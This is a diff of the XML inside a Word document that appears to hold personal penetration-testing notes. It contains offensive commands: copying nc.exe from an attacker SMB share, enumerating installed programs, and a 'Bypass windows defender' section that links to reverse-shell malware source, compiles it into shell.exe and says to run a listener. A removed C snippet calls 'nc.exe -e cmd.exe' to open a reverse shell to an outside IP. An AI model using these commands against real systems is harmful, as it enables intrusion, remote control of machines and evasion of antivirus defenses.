-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>xcopy \\10.10.14.39\share\nc.exe .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Or </w:t>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PreformattedText"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>xcopy \\10.10.14.39\share\nc.exe  C:\Users\Stacy\Documents</w:t>
+        <w:t>hash format: user:password:domain</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11434,53 +12122,8 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>Get installed programs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>cmd /c REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
@@ -11507,19 +12150,19 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+        <w:t>-Windows cmd : copy file from remote share (SMB)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:color w:val="auto"/>
@@ -11528,14 +12171,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Bypass windows defender </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -11550,26 +12185,350 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>-Use prometheus.cpp on (C++)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">*smbserver should be running on kali, then </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:color w:val="auto"/>
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>xcopy \\10.10.14.39\share\nc.exe .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Or </w:t>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PreformattedText"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>xcopy \\10.10.14.39\share\nc.exe  C:\Users\Stacy\Documents</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>Get installed programs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>cmd /c REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Bypass windows defender </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>antivirus</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>-Use prometheus.cpp on (C++)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -11577,7 +12536,7 @@
       <w:hyperlink r:id="rId32">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel10"/>
             <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
@@ -11587,6 +12546,7 @@
             <w:kern w:val="2"/>
             <w:sz w:val="24"/>
             <w:szCs w:val="24"/>
+            <w:u w:val="single"/>
             <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
           </w:rPr>
           <w:t>https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp</w:t>
@@ -11631,7 +12591,21 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="FF4000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -11654,7 +12628,20 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="FF4000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -11676,30 +12663,8 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>i686-w64-mingw32-g++ prometheus.cpp -o shell.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
@@ -11726,28 +12691,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>Don’t forget to set lport, lhost on prometheus.cpp and to run a listener before launch the shell.exe</w:t>
+        <w:t>i686-w64-mingw32-g++ prometheus.cpp -o shell.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11788,52 +12732,8 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>Bypass windows defender using C code</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>Write a simple code in c (exploit.c)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
@@ -11860,29 +12760,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>#include "stdlib.h"</w:t>
+        <w:t>Don’t forget to set lport, lhost on prometheus.cpp and to run a listener before launch the shell.exe</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11923,155 +12801,8 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>int main()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>system("nc.exe -e cmd.exe 192.168.130.1 4444");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>return 0;</w:t>
-      </w:r>
-    </w:p>
